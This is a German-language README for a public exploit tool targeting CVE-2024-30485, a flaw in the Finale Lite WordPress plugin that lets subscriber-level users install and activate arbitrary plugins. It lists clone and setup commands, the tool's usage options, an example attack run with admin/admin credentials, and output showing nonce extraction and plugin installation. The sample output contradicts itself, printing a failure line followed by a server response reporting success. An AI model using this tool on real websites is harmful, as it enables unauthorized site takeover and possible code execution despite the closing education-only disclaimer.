
WordPress Finale Lite Plugin <= 2.18.0 - Subscriber+ Schwachstelle für beliebige Plugin-Installation/-Aktivierung
CVE-2024-30485 ist eine Schwachstelle mit hohem Schweregrad, die im Finale Lite-Plugin für WordPress (Versionen <= 2.18.0) gefunden wurde. Die Schwachstelle ermöglicht authentifizierten Benutzern (Subscriber+) das Installieren und Aktivieren beliebiger Plugins ohne ordnungsgemäße Autorisierung.
requests- und beautifulsoup4-Module# Clone the repository
git clone https://github.com/Nxploited/CVE-2024-30485.git
cd CVE-2024-30485
# Install dependencies
pip install -r requirements.txt
usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]
Exploit CVE-2024-30485 - Finale Lite | # by Khaled AlEnazi
positional arguments:
plugin Plugin slug
options:
-h, --help show this help message and exit
-u TARGET, --url TARGET WordPress site URL
-U USERNAME, --username USERNAME WordPress username
-P PASSWORD, --password PASSWORD WordPress password
python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments
[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response:
<p>Unpacking the package…</p>
<p>Installing the plugin…</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}
Dieses Skript dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Nicht autorisierte Tests an Systemen ohne Erlaubnis sind illegal. Verwenden Sie es verantwortungsbewusst.
Von: Khaled Alenazi (Nxploit)